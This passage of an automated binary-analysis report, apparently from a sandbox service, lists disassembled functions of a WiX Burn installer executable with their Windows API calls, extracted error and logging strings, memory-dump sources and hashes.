                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to add the bundle provider key "%ls" to the list of ignored dependencies.$Failed to add the package provider key "%ls" to the list of ignored dependencies.$Failed to add the provider key "%ls" to the list of ignored dependencies.$Failed to create the string dictionary.$Failed to get the package property: %ls$IGNOREDEPENDENCIES
                                                                                                                                                                  • API String ID: 0-1284964865
                                                                                                                                                                  • Opcode ID: b1026fa22fa066d66e4373e3737e1f82d51fb4507716d07f94081ec64e103e6f
                                                                                                                                                                  • Instruction ID: a31163e25ac7690412e7e155a0dc527f041943885925f6b9b87a44ca6eab7078
                                                                                                                                                                  • Opcode Fuzzy Hash: b1026fa22fa066d66e4373e3737e1f82d51fb4507716d07f94081ec64e103e6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E31E33A900124BBDB129E52CC41FEE77A9EF44724F15406BFD10AB211D73DDD819799
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00425F1D, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 105comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoCreateInstance.OLE32(0044E498,00000000,00000017,0044E4A8,?,?,00000000,00000000,?,?,?,?,?,004264A9,00000000,00000000), ref: 00425F55
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set notification flags for BITS job., xrefs: 00425F9F
                                                                                                                                                                  • Failed to create BITS job., xrefs: 00425F87
                                                                                                                                                                  • Failed to set BITS job to foreground., xrefs: 00425FCE
                                                                                                                                                                  • Failed to create IBackgroundCopyManager., xrefs: 00425F61
                                                                                                                                                                  • Failed to set progress timeout., xrefs: 00425FB7
                                                                                                                                                                  • WixBurn, xrefs: 00425F78
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                  • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                                                                  • API String ID: 542301482-468763447
                                                                                                                                                                  • Opcode ID: 7c419a63f170951291ef6eb948459f02e3c8a27f16b619eb7da85ce86f95f855
                                                                                                                                                                  • Instruction ID: 906077f7369b0878c4c8525a5927c5930a58fe9102b61d985817ee0e2025b8ce
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c419a63f170951291ef6eb948459f02e3c8a27f16b619eb7da85ce86f95f855
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31E531F00625AFDB14CFA9D845E6FBBB4AF48710B51002AF901EB380C678EC018B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407AB3, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 96fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407F4A: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,004094E8,000000FF,00000000,00000000,004094E8,?,?,00408D91,?,?,?,?), ref: 00407F75
                                                                                                                                                                  • CreateFileW.KERNEL32(EB0043B6,80000000,00000005,00000000,00000003,08000000,00000000,00401DE7,880FF685,00000000,004021A7,54680779,00402283,00401DDF,00000000,00401EAB), ref: 00407B23
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0041173E,00402077,00401E9B,00401E9B,00000000,?,00401EAB,00FFFFFD,00401EAB,?,00401DDF,00401DDF,?), ref: 00407B68
                                                                                                                                                                    • Part of subcall function 004141E9: WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414276
                                                                                                                                                                    • Part of subcall function 004141E9: WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414290
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open catalog in working path: %ls, xrefs: 00407B99
                                                                                                                                                                  • catalog.cpp, xrefs: 00407B8C
                                                                                                                                                                  • Failed to get catalog local file path, xrefs: 00407BA9
                                                                                                                                                                  • Failed to verify catalog signature: %ls, xrefs: 00407B61
                                                                                                                                                                  • Failed to find payload for catalog file., xrefs: 00407BB0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: TrustVerify$CompareCreateErrorFileLastString
                                                                                                                                                                  • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                                                                                                                  • API String ID: 357250294-48089280
                                                                                                                                                                  • Opcode ID: d6f3c312d51c711c4a02911773639bf5ec82e7ddc59dfbcadc24a8472dfb164e
                                                                                                                                                                  • Instruction ID: 59e80f1c8acc56c316be8387aa7f63210370a6748d252063ee5d119d3167a94f
                                                                                                                                                                  • Opcode Fuzzy Hash: d6f3c312d51c711c4a02911773639bf5ec82e7ddc59dfbcadc24a8472dfb164e
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D31A431E00611BFDB11AB65CC41F5ABAA4EF08714F208267F904BB2D0E778FA518BD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00431ECE, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 00431F3B
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00431F45
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00431F8E
                                                                                                                                                                  • CloseHandle.KERNEL32(0040F65B,?,?,?,?,00000000,00000000,00000000), ref: 00431F9B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                                  • String ID: "%ls" %ls$D$procutil.cpp
                                                                                                                                                                  • API String ID: 161867955-2732225242
                                                                                                                                                                  • Opcode ID: 149410421210a28da9ca9e371d5b379d2e4a5cd14a93d9700b06125f10d978cf
                                                                                                                                                                  • Instruction ID: 88aacfed63ba10e08a9080e8e171d346880dde1cde18685404fa2e2fc74ddf50
                                                                                                                                                                  • Opcode Fuzzy Hash: 149410421210a28da9ca9e371d5b379d2e4a5cd14a93d9700b06125f10d978cf
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A212D71A0021DAFDB11DFE5CD41AAFB7B8EF08355F10542AEA01B7260D3789E009BA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405C02, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405C1B
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002A8,?,00000000,00000000,000000F8,000000F8,00000000,?,0040689F,000000F8,000000F8,000002A8,000000F8), ref: 00405C30
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040689F,000000F8,000000F8,000002A8,000000F8), ref: 00405C3B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set directory search path variable., xrefs: 00405C6B
                                                                                                                                                                  • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00405CAE
                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00405C98
                                                                                                                                                                  • Failed to format variable string., xrefs: 00405C26
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                  • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                  • API String ID: 1811509786-2966038646
                                                                                                                                                                  • Opcode ID: 3a2f506a79031533fb714ec33e04de99a0c8e64e1b17238e4e5255e6e35a4a5c
                                                                                                                                                                  • Instruction ID: 8ee04f2290911e4e7c9f80f11c7c4f7d31bed2b1113de2c3b44c2261c9a2fef0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a2f506a79031533fb714ec33e04de99a0c8e64e1b17238e4e5255e6e35a4a5c
                                                                                                                                                                  • Instruction Fuzzy Hash: 3721C532904724B7EB1266949D06B9FBA65EF14320F21423BF902B61E0E73D5E10AEDD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F5E1, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 73COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,?,?), ref: 0040F5F5
                                                                                                                                                                    • Part of subcall function 00431C19: GetModuleFileNameW.KERNEL32(r@,?,00000104,?,00000104,?,00000000,00401C5F,?,004072ED,?,00000000,?,?,?,00401C5F), ref: 00431C3A
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040F67A
                                                                                                                                                                    • Part of subcall function 00431ECE: CreateProcessW.KERNEL32 ref: 00431F3B
                                                                                                                                                                    • Part of subcall function 00431ECE: GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00431F45
                                                                                                                                                                    • Part of subcall function 00431ECE: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00431F8E
                                                                                                                                                                    • Part of subcall function 00431ECE: CloseHandle.KERNEL32(0040F65B,?,?,?,?,00000000,00000000,00000000), ref: 00431F9B
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls -%ls %ls %ls %u, xrefs: 0040F626
                                                                                                                                                                  • Failed to get current process path., xrefs: 0040F60D
                                                                                                                                                                  • burn.unelevated, xrefs: 0040F61E
                                                                                                                                                                  • Failed to allocate parameters for elevated process., xrefs: 0040F63A
                                                                                                                                                                  • Failed to launch parent process with unelevate disabled: %ls, xrefs: 0040F664
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$Process$CreateCurrentErrorFileLastModuleName
                                                                                                                                                                  • String ID: %ls -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to get current process path.$Failed to launch parent process with unelevate disabled: %ls$burn.unelevated
                                                                                                                                                                  • API String ID: 104269755-688900554
                                                                                                                                                                  • Opcode ID: 8cc345923506d004e62728c6cafead8a060e814c970353ec67c058b8f9e28932
                                                                                                                                                                  • Instruction ID: caa3efeb91e7c7fc6da20c5dcd3557f38c843eb2389afac2f9818e404911b926
                                                                                                                                                                  • Opcode Fuzzy Hash: 8cc345923506d004e62728c6cafead8a060e814c970353ec67c058b8f9e28932
                                                                                                                                                                  • Instruction Fuzzy Hash: 67216F32D00219FBCF21AFE1DC4199EBB78EF14715F10557BF900B2261D73A8A569B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405DBC, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405DD5
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002A8,?,00000000,00000000,000000F8,000000F8,000002D0,?,0040687B,000000F8,000000F8,000000F8,?,000000F8,000000F8), ref: 00405DEA
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040687B,000000F8,000000F8,000000F8,?,000000F8,000000F8,000000F8,000002A8,000000F8), ref: 00405DF5
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed while searching file search: %ls, for path: %ls, xrefs: 00405E22
                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00405E60
                                                                                                                                                                  • Failed to set variable to file search path., xrefs: 00405E4C
                                                                                                                                                                  • Failed to format variable string., xrefs: 00405DE0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                                                                                                                  • API String ID: 1811509786-3425311760
                                                                                                                                                                  • Opcode ID: b414d6b461ae82a2b8beefb40fe2006c4492d22eeb3ce319996c48d605fa240d
                                                                                                                                                                  • Instruction ID: 4d5173eaec2ed06d73386f93e163334e3389bf3a9cdc790a4b42069f164736be
                                                                                                                                                                  • Opcode Fuzzy Hash: b414d6b461ae82a2b8beefb40fe2006c4492d22eeb3ce319996c48d605fa240d
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A11D436940A24BBDF226795DC06B9FB664EF14720F204127F981761E0D37D8F10AED9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00416002, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 52synchronizationthreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000493E0,00000000,?,?,00416419,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79), ref: 00416014
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00416419,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79,?,?,?), ref: 0041601E
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(?,?,?,?,00416419,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79,?), ref: 0041605A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00416419,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79,?,?,?), ref: 00416064
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                  • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                                                                                                                  • API String ID: 3686190907-1954264426
                                                                                                                                                                  • Opcode ID: fd9939bf32be0cd21153af2acee9032ee74425007f63279a4f5821671410427b
                                                                                                                                                                  • Instruction ID: fc8bc029f09a5049558419c1b939060c5744ce12903c38bfa5631f9b4afe56be
                                                                                                                                                                  • Opcode Fuzzy Hash: fd9939bf32be0cd21153af2acee9032ee74425007f63279a4f5821671410427b
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B01DD72A403347AFB20AB795C05B9B69D4DF09791F125127FE05F7190D758CD0095ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410BA1, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51synchronizationthreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00410F49,00401414,00000088,00000000,00000000,000000B8,00000001), ref: 00410BAE
                                                                                                                                                                  • GetLastError.KERNEL32(?,00410F49,00401414,00000088,00000000,00000000,000000B8,00000001), ref: 00410BB8
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000001,00000000,?,00410F49,00401414,00000088,00000000,00000000,000000B8,00000001), ref: 00410BF7
                                                                                                                                                                  • GetLastError.KERNEL32(?,00410F49,00401414,00000088,00000000,00000000,000000B8,00000001), ref: 00410C01
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                  • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                                                                                                                  • API String ID: 3686190907-2546940223
                                                                                                                                                                  • Opcode ID: 8e18f3e770544a6486462ce3b3989d39e2fa80dfe8d5dc33254e8defa53dabc1
                                                                                                                                                                  • Instruction ID: 6435139f446a6efd778f3f9e3409c65024c3505d1e8fda8ad5aa823c5637c09c
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e18f3e770544a6486462ce3b3989d39e2fa80dfe8d5dc33254e8defa53dabc1
                                                                                                                                                                  • Instruction Fuzzy Hash: 5501A170240304BBEB18DB75AD1AB7E76E4EB04755F20522EB906E51E0E778CA40AA68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041845E, Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 117COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00418473
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00418580
                                                                                                                                                                  Strings
                                                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0041853F
                                                                                                                                                                  • Failed to set source path for container., xrefs: 00418565
                                                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 004184DF
                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 0041848D
                                                                                                                                                                  • Failed to set source path for payload., xrefs: 0041850F
                                                                                                                                                                  • UX denied while trying to set source on embedded payload: %ls, xrefs: 004184F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                  • API String ID: 3168844106-4121889706
                                                                                                                                                                  • Opcode ID: e879a524f23c16bf30150e4722b5612e435163d91fd8a35f3af07d1737850209
                                                                                                                                                                  • Instruction ID: 388dfe5a08aae0b33e8f15910c87a006040726db633ebacbd695147972b50b70
                                                                                                                                                                  • Opcode Fuzzy Hash: e879a524f23c16bf30150e4722b5612e435163d91fd8a35f3af07d1737850209
                                                                                                                                                                  • Instruction Fuzzy Hash: DF31C332E40221BBCB219B59D845E9BB7A9EF14720B55811FF804E7240EF7CED8186AD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00431510, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(0040227F,00000000,?,?,?,?,004021A7,00401F17), ref: 004315A7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,004021A7,00401F17), ref: 004315B5
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,00000000,00000000,00000104,00401DDF,00000000,?,?,?,004087AC,00000000,.ba%d,000F423F,004021A7,00401F17,00000000), ref: 004315EB
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,004087AC,00000000,.ba%d,000F423F,004021A7,00401F17,00000000,00000000,?,?,004116FD,00FFFFFD,00401EAB), ref: 004315F9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryPathTemp
                                                                                                                                                                  • String ID: %s%s$pathutil.cpp
                                                                                                                                                                  • API String ID: 2804724334-3961969462
                                                                                                                                                                  • Opcode ID: 2424b3e8ccbaa1ef5ac275701c9746a0f003e08a7370a8d2466fc544ee3d1d20
                                                                                                                                                                  • Instruction ID: 20e1c1a9b1f833ff858b84943ee8a21cd28ae00810e689138198496587eb4842
                                                                                                                                                                  • Opcode Fuzzy Hash: 2424b3e8ccbaa1ef5ac275701c9746a0f003e08a7370a8d2466fc544ee3d1d20
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F31E736D00225ABDB219BE58C46B9F76A8DB1C750F15216BFD02F7260D77C8D0196EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00430B14, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00430B58
                                                                                                                                                                  • GetComputerNameW.KERNEL32 ref: 00430BB0
                                                                                                                                                                  Strings
                                                                                                                                                                  • Computer : %ls, xrefs: 00430C1C
                                                                                                                                                                  • === Logging started: %ls ===, xrefs: 00430BD9
                                                                                                                                                                  • Executable: %ls v%d.%d.%d.%d, xrefs: 00430C0A
                                                                                                                                                                  • --- logging level: %hs ---, xrefs: 00430C66
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Name$ComputerFileModule
                                                                                                                                                                  • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                                                                                                                  • API String ID: 2577110986-3153207428
